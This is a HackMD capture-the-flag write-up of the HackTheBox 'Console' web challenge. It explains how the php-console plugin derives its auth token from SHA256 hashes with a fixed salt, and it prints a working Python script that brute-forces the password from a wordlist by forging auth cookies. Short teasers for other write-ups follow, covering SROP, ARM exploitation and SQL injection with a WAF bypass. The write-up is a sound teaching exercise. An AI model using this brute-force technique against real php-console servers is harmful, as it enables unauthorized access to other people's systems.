Try   HackMD

HackTheBox - Console

Googling leads us to this plugin: https://chrome.google.com/webstore/detail/php-console/nfhmhhlpfleoednkpnnnkolmclajemef

Looking at the requests and code we can confirm it is using that plugin. The plugin uses multiple sha256 sums of the password for authentication.

Source Code: https://github.com/barbushin/php-console

We can simply copy the "publickey", it's just a hash of the IP and basic UID. For Simplicity's sake we just copy it. There is a field in the response headers isSuccess telling us if we successfully authenticated or not.

I created a bruteforcing script that can be found below.

Code



































import requests
import json
import base64
from hashlib import sha256

wordlist = open('/usr/share/seclists/Passwords/darkweb2017-top1000.txt')
publickey = 'd1d58b2f732fd546d9507da275a71bddc0c2300a214af3f3f3a5f5f249fe275e'
URL = 'http://docker.hackthebox.eu:31061/'

pw = wordlist.readline().strip()

def gen_token(pw):
    salt = 'NeverChangeIt:)'
    pw_hash = sha256(pw+salt).hexdigest()
    return sha256(pw_hash+publickey).hexdigest()


def bf():
    while pw:
        print(pw)
        data = {"php-console-client":5,"auth":{"publicKey":publickey,"token":gen_token(pw)}}
        cookies = {"php-console-client":base64.b64encode(json.dumps(data))}
        print(cookies)
        r = requests.post(URL,allow_redirects=False,cookies=cookies)
        #print(str(r.headers))
        if not '"isSuccess":false' in str(r.headers):
            print("Password found: "+pw)
            print(r.headers)
            break
        pw = wordlist.readline().strip()

bf()

# Password found: poohbear
tags: CTF HTB Web
Last changed by 
imth
just your friendly neighbourhood hacker Twitter: @imthoe
0
406

Read more

SROP - Sigreturn Oriented Programming

A few months ago a colleague of mine created a simple buffer overflow challenge to teach others how to defeat ASLR. The program itself was written in assembly and only consisted of 3 syscalls more or less – read, write and exit. The overflow was easy, there was no boundary check or anything and you could simply write data to the stack. Since the purpose of the challenge was to defeat only ASLR, NX was disabled. The intended solution was to leak a stack address via the write syscall, write some shellcode to the stack, calculate the offset with the leaked address and jump to it. When I started working on the challenge it never occurred to me that I could use a write syscall to leak an address. That's when I dug down the rabbit hole. After some researching I stumpled upon a technique that I had not heard of before: SROP. Spoiler Alert, I didn't solve the challenge with SROP because I was only able to read 58 bytes. I'll explain in a moment why that's important. I was intrigued either way and started learning about it. SROP stands for Sigreturn Oriented Programming and unlike Return Oriented Programming only requires 2 Gadgets, the ability to write 300 bytes to the stack and the ability to control the Instruction Pointer. The required gadgets are a sigreturn and a syscall return gadget. In older Linux Kernels these are often already available at a fixed address. A sigreturn is used to return from the signal handler and to clean up the stack frame after a signal has been unblocked. And "cleaning up the stack frame" really means it's restoring important context data that has been saved on the stack temporarily. This data includes values of all registers and some things that are unrelevant for exploitation, which is also the reason why at least 300 bytes are required for it to work. I won't go into detail about the context struct that is used to store this data. The python library pwntools already provides an easy method to forge these structs. This will allow us to control all registers with only a single gadget. Once these requirements are met it's possible to do basically anything. In my exploit I will use mprotect to make a memory segment with a fixed address writable and executable, shift the stack to this address space,write some shellcode on the stack and execute it by returning to it.

Oct 10, 2021
HackTheBox - Intense

Enumeration Nmap: # Nmap 7.80 scan initiated Sat Jul 11 17:54:15 2020 as: nmap -sC -sV -oN nmap 10.10.10.195 Nmap scan report for 10.10.10.195 Host is up (0.043s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey:

Apr 9, 2021
HackTheBox - Antidote

Introduction With this writeup I want to give a brief introduction into ARM exploitation and explain some of the differences compared to x86 aswell as common pitfalls or things to look out for. It was one of the first ARM challenges I've solved all by myself so I'll try to explain my thought process and approach. Let's get into it! The challenge is a simple buffer overflow on a 32-bit ARM processor architecture. We are provided both the challenge exectuable and the libc shared library, which is a huge help in calculating offsets. pi@raspberrypi:~/Antidote $ file antidote antidote: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.3, for GNU/Linux 2.6.16, not stripped

Feb 21, 2021
HackTheBox - Multimaster

Foothold Webserver with /api/getColleagues SQL Injection with a WAF Bypass User Simple Data Exfil http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/ https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

Jun 1, 2020
Read more from imth
Published on HackMD